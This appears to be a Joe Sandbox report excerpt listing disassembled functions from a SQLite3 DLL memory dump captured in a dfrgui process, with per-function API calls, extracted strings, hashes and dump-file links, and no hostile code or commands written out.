Instruction ID: 1f022e7ac6fcd83c163822c3163dfa4a1e7987374d8779c293f71e4e5247707f
Opcode Fuzzy Hash: 2e5e3aaccfb881f83326e9133b84d88ad3ce1c2bf61a48c902a9eb6077d98689
Instruction Fuzzy Hash: 20212D78A18A42CFCB40AFA9D8C461577F4FB86309F65C8ADD8848F305D735D8A2CB52

Function 61E8D860 Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

sqlite3_malloc64.SQLITE3 ref: 61E8D8E5

Part of subcall function 61E36841: sqlite3_initialize.SQLITE3 ref: 61E3684C

sqlite3_mprintf.SQLITE3 ref: 61E8D926
sqlite3_prepare_v2.SQLITE3 ref: 61E8D957
sqlite3_free.SQLITE3 ref: 61E8D962
sqlite3_step.SQLITE3 ref: 61E8D978
sqlite3_finalize.SQLITE3(?), ref: 61E8DA5A

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_finalizesqlite3_freesqlite3_initializesqlite3_malloc64sqlite3_mprintfsqlite3_prepare_v2sqlite3_step
String ID:
API String ID: 1805541765-0
Opcode ID: c65f27d857b0b27c1aebd88a8693cbe85855ac2ef2d67a324d7274bdd073171e
Instruction ID: ba9c3c05370affc7c5dbc05d4a2b538fe50f373742a71166a5d993187638f8bf
Opcode Fuzzy Hash: c65f27d857b0b27c1aebd88a8693cbe85855ac2ef2d67a324d7274bdd073171e
Instruction Fuzzy Hash: F8611779A053599FDB40DFA8C58069DFBF1BF88318F25C52AE868AB340D774E841CB91

Function 61E8D27D Relevance: 13.6, APIs: 9, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_malloc64.SQLITE3 ref: 61E8D2F4
sqlite3_exec.SQLITE3 ref: 61E8D327
sqlite3_free_table.SQLITE3 ref: 61E8D346
sqlite3_free.SQLITE3 ref: 61E8D35A
sqlite3_mprintf.SQLITE3 ref: 61E8D36D
sqlite3_free.SQLITE3 ref: 61E8D37A
sqlite3_free.SQLITE3 ref: 61E8D38D

Part of subcall function 61E0AE03: sqlite3_mutex_enter.SQLITE3 ref: 61E0AE22

sqlite3_free_table.SQLITE3 ref: 61E8D3A1

Part of subcall function 61E0B77E: sqlite3_free.SQLITE3 ref: 61E0B7AC

sqlite3_free_table.SQLITE3 ref: 61E8D3CA

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_enter
String ID:
API String ID: 1665699395-0
Opcode ID: b53d39383b9c04afc8262a030f0dbc389d17a0c77ebfc8c7f5da9088c7444d34
Instruction ID: 3315c54762632d2a79740d7e2080af05c437cc957e1fbf450a2cdb5cbf038cb0
Opcode Fuzzy Hash: b53d39383b9c04afc8262a030f0dbc389d17a0c77ebfc8c7f5da9088c7444d34
Instruction Fuzzy Hash: 3951D2B4905249DBEB40DFA8D584B9EBBF4FF48308F20842AE858AB350D775E840CF91

Function 61E3706C Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E37230
sqlite3_malloc64.SQLITE3 ref: 61E3725C
sqlite3_free.SQLITE3 ref: 61E37330
sqlite3_free.SQLITE3 ref: 61E37349
memcmp.MSVCRT ref: 61E373C2
memcmp.MSVCRT ref: 61E374F2

Strings

0, xrefs: 61E374DE

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: memcmp$sqlite3_free$sqlite3_malloc64
String ID: 0
API String ID: 3361124181-4108050209
Opcode ID: 0001e725639776dd20ef79f7138d0376e4efb069e45081a651de451bba70cf2b
Instruction ID: 32d765ce6dc0c5a3b13a855c43943f43ad6b28b2a37c0a9f390b62befd594ec3
Opcode Fuzzy Hash: 0001e725639776dd20ef79f7138d0376e4efb069e45081a651de451bba70cf2b
Instruction Fuzzy Hash: 66E10170E04369CBDB11CFA8C88078DBBF1AF89318F658569D859AB385D774E886CF41

Function 61E040F8 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

sqlite3_strnicmp.SQLITE3 ref: 61E04181
sqlite3_strnicmp.SQLITE3 ref: 61E0424F

Strings

schema, xrefs: 61E041AB, 61E041C9, 61E0425F
main, xrefs: 61E04138
sqlite_temp_master, xrefs: 61E04296
sqlite_master, xrefs: 61E0427D
temp_schema, xrefs: 61E04197, 61E0426D

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_strnicmp
String ID: main$schema$sqlite_master$sqlite_temp_master$temp_schema
API String ID: 1961171630-18422345
Opcode ID: 03dad655314c97338a56379893c054c6dff5d738b95dd2ee6cc9b005468ba57f
Instruction ID: 76c6ac93a572209649a424a2d87bbebf8a643908e3eea93c8af90eabc0bca697
Opcode Fuzzy Hash: 03dad655314c97338a56379893c054c6dff5d738b95dd2ee6cc9b005468ba57f
Instruction Fuzzy Hash: 704170B5B042028BE704DFA9CA40A1A77F5AFE474EB35C46ADC04DF745D730E92287A1

Function 61E97A40 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

sqlite3_step.SQLITE3(?,?,?,?,?,?,?,?,00000004,?,61E983B7), ref: 61E97A7F
sqlite3_finalize.SQLITE3 ref: 61E97AFF
sqlite3_finalize.SQLITE3 ref: 61E97B4D

Strings

integer, xrefs: 61E97AC0
real, xrefs: 61E97AC5
null, xrefs: 61E97AB6, 61E97ACF

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_finalize$sqlite3_step
String ID: integer$null$real
API String ID: 2395141310-2769304496
Opcode ID: e0632633b41bef93469defd2b4f792d1f77a7fdef44224526140c119515e2d8b
Instruction ID: 9db01584d04ace6585b7bc7b727936d29f34d7e2b5a3e1f1c95c7c1af81cc1ae
Opcode Fuzzy Hash: e0632633b41bef93469defd2b4f792d1f77a7fdef44224526140c119515e2d8b
Instruction Fuzzy Hash: 7741E3B0E047558FCB04DFA9C58469ABBF1BF88314F25C969D848AB351E378E841CFA5

Function 61EAF660 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 61EAF68B
vfprintf.MSVCRT ref: 61EAF6A7
abort.MSVCRT ref: 61EAF6AC
VirtualQuery.KERNEL32 ref: 61EAF750
VirtualProtect.KERNEL32 ref: 61EAF792

Strings

@, xrefs: 61EAF77B

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: Virtual$ProtectQueryabortfwritevfprintf
String ID: @
API String ID: 1503958624-2766056989
Opcode ID: c2659c9de0e6f83528643800fc17f210c5c049cf07d0f7c16b155af3332bfc43
Instruction ID: 71557b49bb5d6fd444914b003338233c64a679981824e95bd87dc14e517cf95e
Opcode Fuzzy Hash: c2659c9de0e6f83528643800fc17f210c5c049cf07d0f7c16b155af3332bfc43
Instruction Fuzzy Hash: 3F4118B19147419FD700DF78C98464ABBE0FB89758F65C92DE8A8DB350E734E884CB92

Function 61E1FAC4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

sqlite3_aggregate_context.SQLITE3 ref: 61E1FAF2
sqlite3_value_text.SQLITE3 ref: 61E1FB06
sqlite3_value_bytes.SQLITE3 ref: 61E1FB10
memmove.MSVCRT ref: 61E1FB42
memmove.MSVCRT ref: 61E1FB71
sqlite3_free.SQLITE3 ref: 61E1FB89

Strings

$, xrefs: 61E1FAE7

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: memmove$sqlite3_aggregate_contextsqlite3_freesqlite3_value_bytessqlite3_value_text
String ID: $
API String ID: 3554930288-3993045852
Opcode ID: f5ac88605cd1fbf474cbecef34f43497ab83a55ac9fa07a6fce37533d5b6c58c
Instruction ID: 809b0e095c5bf26879beab54d349c326606335d08b536193ef2cb1d5b18d093a
Opcode Fuzzy Hash: f5ac88605cd1fbf474cbecef34f43497ab83a55ac9fa07a6fce37533d5b6c58c
Instruction Fuzzy Hash: 78213BB59087428FDB04DF68C585A1ABBE0BF88314F21CA9DDC998B349D778E854CBC1

Function 61E8DA69 Relevance: 12.1, APIs: 8, Instructions: 113COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E8DA97
sqlite3_mprintf.SQLITE3 ref: 61E8DADD

Part of subcall function 61E42CCC: sqlite3_initialize.SQLITE3 ref: 61E42CD2
Part of subcall function 61E42CCC: sqlite3_vmprintf.SQLITE3 ref: 61E42CEC

sqlite3_prepare_v2.SQLITE3 ref: 61E8DB0D
sqlite3_step.SQLITE3 ref: 61E8DB3D
sqlite3_free.SQLITE3 ref: 61E8DB1A

Part of subcall function 61E0AE03: sqlite3_mutex_enter.SQLITE3 ref: 61E0AE22

sqlite3_finalize.SQLITE3 ref: 61E8DBB7
sqlite3_free.SQLITE3 ref: 61E8DBCE
sqlite3_mutex_leave.SQLITE3 ref: 61E8DBD9

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_freesqlite3_mutex_enter$sqlite3_finalizesqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_stepsqlite3_vmprintf
String ID:
API String ID: 3659669890-0
Opcode ID: b3a8b74cb2096703132816c8aa8c1af14d3ba9167593db0f53c02a9c0918322a
Instruction ID: ee15ccad656ace3c99dde9c99940c01688ce76146d65e56905fab0b1cabd3d77
Opcode Fuzzy Hash: b3a8b74cb2096703132816c8aa8c1af14d3ba9167593db0f53c02a9c0918322a
Instruction Fuzzy Hash: 4A4118B49083458FDB04DFA9C584A99BBF0FF88324F25C56AEC589B351D374D841CB91

Function 61E056F2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

sqlite3_strnicmp.SQLITE3 ref: 61E0586C
sqlite3_strnicmp.SQLITE3 ref: 61E05893
sqlite3_strnicmp.SQLITE3 ref: 61E058D3
sqlite3_strnicmp.SQLITE3 ref: 61E058FD
sqlite3_strnicmp.SQLITE3 ref: 61E05926

Strings

~qa, xrefs: 61E0591B

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_strnicmp
String ID: ~qa
API String ID: 1961171630-1872260373
Opcode ID: 5fbcb9ace52dddd43d6c5d314c7ea6775a8d3629c5178b18c52489fec46d55b0
Instruction ID: 3c24ae2d0667c51d45a4f266d29c7782501a6e746747c7c62ad997d34e70b38e
Opcode Fuzzy Hash: 5fbcb9ace52dddd43d6c5d314c7ea6775a8d3629c5178b18c52489fec46d55b0
Instruction Fuzzy Hash: 6051D67544D241C9E7104E9884823A5BBA79F4336FFBCC51AC8B446351D23AC5BAEB62

Function 61E21CAE Relevance: 10.7, APIs: 7, Instructions: 171COMMON

Download Yara Rule

APIs

sqlite3_value_text.SQLITE3 ref: 61E21CD2
sqlite3_value_bytes.SQLITE3 ref: 61E21CE7
sqlite3_value_text.SQLITE3 ref: 61E21D00
memcmp.MSVCRT ref: 61E21DE5
memcmp.MSVCRT ref: 61E21E39
sqlite3_free.SQLITE3 ref: 61E21E60
sqlite3_result_text.SQLITE3 ref: 61E21E7E

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
String ID:
API String ID: 3386002893-0
Opcode ID: 0c3b4811603101ba568c8ae5bb33fe1982e8f9606e5342451e9a73297e2cd7b3
Instruction ID: f277de8c071d9ee1a10c745fc8c3321002eca8a40deb4930147c7c91aa9a41e3
Opcode Fuzzy Hash: 0c3b4811603101ba568c8ae5bb33fe1982e8f9606e5342451e9a73297e2cd7b3
Instruction Fuzzy Hash: DD518E70E042568FDB04DFE8C9A069DBBF1AF89314F25C52DE864AB390D732DA41CB91

Function 61E34C90 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 136COMMON

Download Yara Rule

Strings

`fa, xrefs: 61E34D07
`fa, xrefs: 61E34CFD
@fa, xrefs: 61E34D19
@fa, xrefs: 61E34D40

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_log
String ID: @fa$@fa$`fa$`fa
API String ID: 632333372-4285383402
Opcode ID: 313e207a2957ceb82c2f575f289d961b347095e00c44d569d7820b577a7873cd
Instruction ID: 74861c6a00f2bc2ba95ee96353378a6cdfc78ee8ebba1450b87e39b9e32948ab
Opcode Fuzzy Hash: 313e207a2957ceb82c2f575f289d961b347095e00c44d569d7820b577a7873cd
Instruction Fuzzy Hash: 225106B46196A9DBDF00CF5AD680A557BE4E79E314F24C46BFC148F348D632D881CBA2

Function 61E01040 Relevance: 10.6, APIs: 7, Instructions: 132sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,61E012DC), ref: 61E01077
_amsg_exit.MSVCRT ref: 61E010A4

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 9d60fae50df211a1bd5751b7d76c8ab20bfb03bb410e22e94b4a1aab23d258a9
Instruction ID: bbf5ca9587f5a3ab20ae3179a7b331856fa166f690329a6dbf0893c8c156ff01
Opcode Fuzzy Hash: 9d60fae50df211a1bd5751b7d76c8ab20bfb03bb410e22e94b4a1aab23d258a9
Instruction Fuzzy Hash: 59414F71B146818FEB00AFE8C98470BB7F1EB85399F64C53DE4A48B344D775D9918B82

Function 61E2D26E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 61E2D0A4: sqlite3_log.SQLITE3 ref: 61E2D0D6

sqlite3_mutex_enter.SQLITE3 ref: 61E2D29D
sqlite3_value_text16le.SQLITE3 ref: 61E2D2B1
sqlite3_value_text16le.SQLITE3 ref: 61E2D2DF
sqlite3_mutex_leave.SQLITE3 ref: 61E2D2F4

Strings

bad parameter or other API misuse, xrefs: 61E2D284
out of memory, xrefs: 61E2D273, 61E2D295

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
String ID: bad parameter or other API misuse$out of memory
API String ID: 3568942437-948784999
Opcode ID: 2d6702cbcbccb98048a7695120c821e5c0e3f8ed9f7282158626428addd3313a
Instruction ID: 2627650648f903a8bf6f78113316b5e0b64ca4bb7ec28c0f362ad93acc317857
Opcode Fuzzy Hash: 2d6702cbcbccb98048a7695120c821e5c0e3f8ed9f7282158626428addd3313a
Instruction Fuzzy Hash: F9018075A083818BDB00AFF989D1659BBE4BF45668F69887DDD48CB305E734D8408782

Function 61E0C3F2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3(?,00000000,?,61E15F21), ref: 61E0C41C
sqlite3_mutex_leave.SQLITE3(?,00000000,?,61E15F21), ref: 61E0C458
sqlite3_mutex_enter.SQLITE3(?,00000000,?,61E15F21), ref: 61E0C470
sqlite3_mutex_leave.SQLITE3(?,00000000,?,61E15F21), ref: 61E0C483
sqlite3_free.SQLITE3(?,00000000,?,61E15F21), ref: 61E0C48B

Strings

,ea, xrefs: 61E0C414, 61E0C450, 61E0C468, 61E0C475

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
String ID: ,ea
API String ID: 251237202-3149854123
Opcode ID: 589ae2881a892b51e35cc4aace64d2022a654ae91323b965527d9d4b174b2909
